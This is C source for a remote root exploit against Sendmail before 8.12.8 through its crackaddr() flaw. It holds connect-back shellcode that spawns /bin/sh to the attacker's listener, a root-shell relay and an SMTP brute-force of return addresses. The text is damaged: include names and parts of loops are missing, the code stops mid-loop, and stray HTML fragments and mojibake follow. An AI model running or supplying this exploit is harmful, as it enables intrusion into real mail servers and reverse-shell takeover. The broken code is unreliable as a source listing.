/* Sendmail <8.12.8 crackaddr() exploit by bysin */ /* from the l33tsecurity crew */ #include #include #include #include #include #include #include #include #include int maxarch=1; struct arch { char *os; int angle,nops; unsigned long aptr; } archs[] = { {"Slackware 8.0 with sendmail 8.11.4",138,1,0xbfffbe34} }; ///////////////////////////////////////////////////////// #define LISTENPORT 2525 #define BUFSIZE 4096 char code[]= /* 116 bytes */ "\xeb\x02" /* jmp */ "\xeb\x08" /* jmp */ "\xe8\xf9\xff\xff\xff" /* call */ "\xcd\x7f" /* int $0x7f */ "\xc3" /* ret */ "\x5f" /* pop %edi */ "\xff\x47\x01" /* incl 0x1(%edi) */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x6a\x01" /* push $0x1 */ "\x6a\x02" /* push $0x2 */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\x43" /* inc %ebx */ "\xff\xd7" /* call *%edi */ "\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x5e" /* pop %esi */ "\x6a\x10" /* push $0x10 */ "\x56" /* push %esi */ "\x50" /* push %eax */ "\x50" /* push %eax */ "\x5e" /* pop %esi */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x6a\x03" /* push $0x3 */ "\x5b" /* pop %ebx */ "\xff\xd7" /* call *%edi */ "\x56" /* push %esi */ "\x5b" /* pop %ebx */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x03" /* mov $0x3,%cl */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x3f" /* mov $0x3f,%al */ "\x49" /* dec %ecx */ "\xff\xd7" /* call *%edi */ "\x41" /* inc %ecx */ "\xe2\xf6" /* loop */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x54" /* push %esp */ "\x5b" /* pop %ebx */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\x31\xd2" /* xor %edx,%edx */ "\xb0\x0b" /* mov $0xb,%al */ "\xff\xd7" /* call *%edi */ ; void header() { printf("\nSendmail <8.12.8 crackaddr() exploit by bysin\n"); printf(" from the l33tsecurity crew \n\n"); } void printtargets() { unsigned long i; header(); printf("\t Target\t Addr\t\t OS\n"); printf("\t-------------------------------------------\n"); for (i=0;i=0x80)&&((c)<0xa0))) void findvalmask(char* val,char* mask,int len) { int i; unsigned char c,m; for(i=0;ih_addr, hostm->h_length); } abuf[3]=(ip>>24)&0xff; abuf[2]=(ip>>16)&0xff; abuf[1]=(ip>>8)&0xff; abuf[0]=(ip)&0xff; pbuf[0]=(port>>8)&0xff; pbuf[1]=(port)&0xff; findvalmask(abuf,amask,4); findvalmask(pbuf,pmask,2); memcpy(&code[33],abuf,4); memcpy(&code[38],amask,4); memcpy(&code[48],pbuf,2); memcpy(&code[53],pmask,2); } void getrootprompt() { int sockfd,sin_size,tmpsock,i; struct sockaddr_in my_addr,their_addr; char szBuffer[1024]; if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Error creating listening socket\n"); return; } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(LISTENPORT); my_addr.sin_addr.s_addr = INADDR_ANY; memset(&(my_addr.sin_zero), 0, 8); if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { printf("Error binding listening socket\n"); return; } if (listen(sockfd, 1) == -1) { printf("Error listening on listening socket\n"); return; } sin_size = sizeof(struct sockaddr_in); if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) { printf("Error accepting on listening socket\n"); return; } writesocket(tmpsock,"uname -a\n"); while(1) { fd_set readfs; FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(tmpsock,&readfs); if(select(tmpsock+1,&readfs,NULL,NULL,NULL)) { int cnt; char buf[1024]; if (FD_ISSET(0,&readfs)) { if ((cnt=read(0,buf,1024)) < 1) { if(errno==EWOULDBLOCK || errno==EAGAIN) continue; else { printf("Connection closed\n"); return; } } write(tmpsock,buf,cnt); } if (FD_ISSET(tmpsock,&readfs)) { if ((cnt=read(tmpsock,buf,1024)) < 1) { if(errno==EWOULDBLOCK || errno==EAGAIN) continue; else { printf("Connection closed\n"); return; } } write(1,buf,cnt); } } } close(tmpsock); close(sockfd); return; } int main(int argc, char **argv) { struct sockaddr_in server; unsigned long ipaddr,i,bf=0; int sock,target; char tmp[BUFSIZE],buf[BUFSIZE],*p; if (argc <= 3) { printf("%s [bruteforce start addr]\n",argv[0]); printtargets(); return 0; } target=atol(argv[3]); if (target < 0 || target >= maxarch) { printtargets(); return 0; } if (argc > 4) sscanf(argv[4],"%x",&bf); header(); fixshellcode(argv[2],LISTENPORT); if (bf && !fork()) { getrootprompt(); return 0; } bfstart: if (bf) { printf("Trying address 0x%x\n",bf); fflush(stdout); } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Unable to create socket\n"); exit(0); } server.sin_family = AF_INET; server.sin_port = htons(25); if (!bf) { printf("Resolving address... "); fflush(stdout); } if ((ipaddr = inet_addr(argv[1])) == -1) { struct hostent *hostm; if ((hostm=gethostbyname(argv[1])) == NULL) { printf("Unable to resolve address\n"); exit(0); } memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length); } else server.sin_addr.s_addr = ipaddr; memset(&(server.sin_zero), 0, 8); if (!bf) { printf("Address found\n"); printf("Connecting... "); fflush(stdout); } if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) { printf("Unable to connect\n"); exit(0); } if (!bf) { printf("Connected!\n"); printf("Sending exploit... "); fflush(stdout); } readsocket(sock,220); writesocket(sock,"HELO yahoo.com\r\n"); readsocket(sock,250); writesocket(sock,"MAIL FROM: spiderman@yahoo.com\r\n"); readsocket(sock,250); writesocket(sock,"RCPT TO: MAILER-DAEMON\r\n"); readsocket(sock,250); writesocket(sock,"DATA\r\n"); readsocket(sock,354); memset(buf,0,sizeof(buf)); p=buf; for (i=0;i
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß